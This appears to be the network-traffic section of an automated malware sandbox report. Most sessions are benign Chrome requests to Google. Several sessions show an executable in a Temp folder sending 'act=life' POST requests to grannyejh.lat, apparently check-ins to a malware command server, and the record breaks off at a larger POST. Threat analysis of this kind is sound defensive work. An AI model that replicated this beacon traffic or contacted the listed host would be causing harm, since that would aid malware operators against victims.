2024-12-19 09:10:24 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:10:24 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 46 64 30 59 2b 72 6f 31 70 6b 53 48 37 4d 35 71 38 70 57 61 6e 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Fd0Y+ro1pkSH7M5q8pWanw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49908	172.67.179.109	443	6972	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:28 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:10:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:10:42 UTC	1117	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=72uin5m7rfus2b3adm449chik2; expires=Mon, 14 Apr 2025 02:57:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ez9Xg3Xz3xGX7VCn5B0rq49ypj8muVYjrXLWPpL0OMhw7POHtMicnMQZ1AxwBqerKxgNMd5K7RFW7kItN%2BWxOr4EldGu60bylDpWaUmRQkN%2FtgT9kEGrcB5IQRCNRbkA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46427f4d3e42ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1559&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1805813&cwnd=143&unsent_bytes=0&cid=d07327906d0b7cda&ts=13937&x=0"
2024-12-19 09:10:42 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:10:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49936	172.217.19.228	443	3476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:39 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 09:10:40 UTC	1266	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:39 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-KQsGNS5pfILOLthb8CBAhg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-19 09:10:40 UTC	124	IN	Data Raw: 33 35 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 72 61 76 69 63 68 61 6e 64 72 61 6e 20 61 73 68 77 69 6e 20 72 65 74 69 72 65 6d 65 6e 74 22 2c 22 70 6f 72 74 20 76 69 6c 61 20 76 61 6e 75 61 74 75 20 65 61 72 74 68 71 75 61 6b 65 22 2c 22 77 65 73 74 65 72 6e 20 77 61 73 68 69 6e 67 74 6f 6e 20 70 6f 77 65 72 20 6f 75 74 61 67 65 73 22 2c 22 64 6f 77 20 6a 6f 6e 65 73 Data Ascii: 351)]}'["",["ravichandran ashwin retirement","port vila vanuatu earthquake","western washington power outages","dow jones
2024-12-19 09:10:40 UTC	732	IN	Data Raw: 20 73 74 6f 63 6b 20 6d 61 72 6b 65 74 73 22 2c 22 77 68 61 74 20 77 65 20 64 6f 20 69 6e 20 74 68 65 20 73 68 61 64 6f 77 73 20 66 69 6e 61 6c 65 20 65 6e 64 69 6e 67 73 22 2c 22 6c 69 76 65 72 70 6f 6f 6c 20 66 63 20 63 61 72 61 62 61 6f 20 63 75 70 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 67 61 6d 65 73 22 2c 22 69 72 73 20 74 61 78 20 62 72 61 63 6b 65 74 73 20 32 30 32 34 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 Data Ascii: stock markets","what we do in the shadows finale endings","liverpool fc carabao cup","nintendo switch 2 games","irs tax brackets 2024"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpb
2024-12-19 09:10:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49938	172.217.19.228	443	3476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:39 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49939	172.217.19.228	443	3476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:39 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 09:10:40 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 19 Dec 2024 09:10:39 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-19 09:10:40 UTC	372	IN	Data Raw: 31 37 33 37 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1737)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-19 09:10:40 UTC	19	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 0d 0a Data Ascii: enu-content","met
2024-12-19 09:10:40 UTC	259	IN	Data Raw: 66 64 0d 0a 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 38 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e Data Ascii: fdadata":{"bar_height":60,"experiment_id":[3700308,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\n
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 Data Ascii: 8000y{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c Data Ascii: }toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];_.L
2024-12-19 09:10:40 UTC	1390	IN	Data Raw: 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f Data Ascii: \"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49940	172.217.19.228	443	3476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:39 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 09:10:40 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 19 Dec 2024 09:10:40 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-19 09:10:40 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-19 09:10:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49946	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:39 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:10:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:10:55 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ja1fb65597m3b8mkm8ltbrtoha; expires=Mon, 14 Apr 2025 02:57:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HMHC7U2DyKZTF8mu34jCdoXQQI2QAts7wkuldg3aCWoz%2Bh%2F2j8DMSy9uKLRnrTEjN5YkRh1ktjpC82%2Ff%2BcmpaHX1xjp8QqtBu66OL7FuxWeBPyg1GypZIeH%2FydGDmn7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4642c4ce930c7e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1597&rtt_var=606&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1793611&cwnd=77&unsent_bytes=0&cid=b2ef8804ad405789&ts=15422&x=0"
2024-12-19 09:10:55 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:10:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	50020	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:10:56 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: grannyejh.lat
